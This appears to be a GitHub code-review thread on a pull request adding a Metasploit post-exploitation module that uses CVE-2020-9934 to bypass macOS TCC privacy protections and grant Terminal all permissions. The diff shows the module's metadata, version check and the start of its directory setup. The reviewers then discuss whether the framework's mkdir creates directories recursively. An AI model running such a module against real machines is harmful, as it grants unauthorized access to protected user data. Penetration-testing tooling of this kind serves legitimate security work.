modules/post/osx/escalate/tccbypass.rb

```diff
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bypass the macOS TCC Framework',
+        'Description' => %q{
+          This module uses the CVE-2020-9934 to bypass the TCC framework and grant all
+          permissions to the Terminal application.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mattshockl', # discovery
+          'timwr', # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2020-9934'],
+          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
+          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
+        ],
+        'Platform' => [ 'osx' ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ]
+      )
+    )
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
+    ])
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version >= Gem::Version.new('10.15.6')
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
+    end
+  end
+
+  def run
+    if check != Exploit::CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    tmpdir = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha(8)}"
+    tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"
+    tccdb = "#{tccdir}/TCC.db"
+
+    print_status("Creating TCC directory #{tccdir}")
+    cmd_exec("mkdir -p '#{tccdir}'")
```

Comment:
The `File` mixin exposes a `mkdir` method for this purpose.

```suggestion
    mkdir(tccdir)
```

Reply:
I'm not sure if this is a bug we want to fix but the File mkdir function does not recursively create directories (e.g it does not perform `mkdir -p`). I will keep it as cmd_exec(mkdir -p ...) for now....

Reply:
```ruby
# grep -rn "def mkdir" lib/ -A 15
lib/msf/core/post/file.rb:81:  def mkdir(path)
lib/msf/core/post/file.rb-82-    vprint_status("Creating directory #{path}")
lib/msf/core/post/file.rb-83-    if session.type == 'meterpreter'
lib/msf/core/post/file.rb-84-      vprint_status("Meterpreter Session")
lib/msf/core/post/file.rb-85-      result = session.fs.dir.mkdir(path)
lib/msf/core/post/file.rb-86-    else
lib/msf/core/post/file.rb-87-      if session.platform == 'windows'
lib/msf/core/post/file.rb-88-        result = cmd_exec("mkdir \"#{path}\"")
lib/msf/core/post/file.rb-89-      else
lib/msf/core/post/file.rb-90-        result = cmd_exec("mkdir -p '#{path}'")
lib/msf/core/post/file.rb-91-      end
lib/msf/core/post/file.rb-92-    end
lib/msf/core/post/file.rb-93-    vprint_status("#{path} created")
lib/msf/core/post/file.rb-94-    register_dir_for_cleanup(path)
lib/msf/core/post/file.rb-95-    result
lib/msf/core/post/file.rb-96-  end
```

Reply:
See line 85, maybe I can fix it in mettle. I'm not sure what the behavior on other platforms is

Reply:
As far as I can tell none of the meterpreters do mkdir recursively. In theory we could add a `-r` option to the api but not all platforms support it (e.g there is no recursive CreateDirectoryW).

Reply:
> As far as I can tell none of the meterpreters do mkdir recursively. 

lame